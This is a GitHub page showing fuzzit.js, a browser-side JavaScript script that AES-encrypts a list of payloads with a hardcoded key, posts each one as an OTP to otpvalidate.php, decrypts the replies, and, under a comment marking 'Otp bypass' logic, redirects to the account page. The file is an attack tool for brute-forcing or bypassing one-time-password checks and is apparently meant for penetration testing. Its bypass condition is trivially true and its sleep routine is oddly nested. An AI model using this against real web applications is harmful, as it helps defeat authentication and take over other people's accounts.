-
Notifications
You must be signed in to change notification settings - Fork 1
/
Copy pathfuzzit.js
62 lines (49 loc) · 1.35 KB
/
fuzzit.js
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
//payload::
function payloads(){
var x = document.createElement("textarea");
x.setAttribute('id', 'payloads');
document.body.appendChild(x);
}
// Fuzzing logic::
function fuzz(){
var textArea = document.getElementById('payloads');
var lines = textArea.value.split('\n');
for (var j = 0; j < lines.length; j++) {
// write your logic here...
console.log('Payload: ' + lines[j]);
// your AES Key and IV
var mykey = "myKey123"
//Call encryption method
otpEncrypt = CryptoJS.AES.encrypt( lines[j], mykey, {format: CryptoJSAesJson} );
//Encrypted Payload
console.log('Encrypted Payload: ' + otpEncrypt);
//Prepare post request
$.post("otpvalidate.php",{
otp: otpEncrypt.toString()
},
//Handle Response
function(res){
//Call Decrypt method
var data2 = CryptoJS.AES.decrypt(JSON.stringify(res), mykey, {format: CryptoJSAesJson}).toString(CryptoJS.enc.Utf8);
var data = JSON.parse(data2);
//Decrypted response
console.log(data);
//logic for Otp bypass
var a = data[10];
$("#message").html(data.slice(23,36));
if(a == a)
window.location.href="my_account.php";
},"json");
//sleep
sleep(3000);
}
// sleep function
function sleep(milliseconds) {
var start = new Date().getTime();
for (var i = 0; i < 1e7; i++) {
if ((new Date().getTime() - start) > milliseconds){
break;
}
}
}
}